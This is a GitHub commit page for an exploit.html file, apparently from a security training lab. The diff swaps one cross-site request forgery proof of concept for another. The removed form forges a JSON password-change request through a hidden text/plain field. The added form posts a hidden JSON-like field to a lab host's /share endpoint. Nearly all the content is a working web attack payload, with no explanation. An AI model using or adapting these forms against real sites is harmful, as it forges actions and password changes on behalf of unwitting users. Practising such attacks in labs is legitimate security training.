Skip to content

Commit

Permalink
Update exploit.html
Browse files Browse the repository at this point in the history
  • Loading branch information
0xLittleSpidy authored Feb 18, 2024
1 parent 111ca0e commit f4697cd
Showing 1 changed file with 7 additions and 16 deletions.
23 changes: 7 additions & 16 deletions exploit.html
Original file line number Diff line number Diff line change
@@ -1,17 +1,8 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>Exploit</title>
</head>

<body>
<h1> Exploit </h1>
<form id="csrf" action="http://example/change_password" method="POST" enctype="text/plain" >
<input type="hidden" name='{"password":"Password123' value='"}' >
</form>
</body>

</html>
<body>
<form method="POST" action="https://ptl-7374ade8-f31b71a6.libcurl.so/share">
<input type="hidden" name="{"user":"test","id":0}" value="undefined"/>
<input type="submit" value="Submit">
</form>
</body>
<html>

0 comments on commit f4697cd

Please sign in to comment.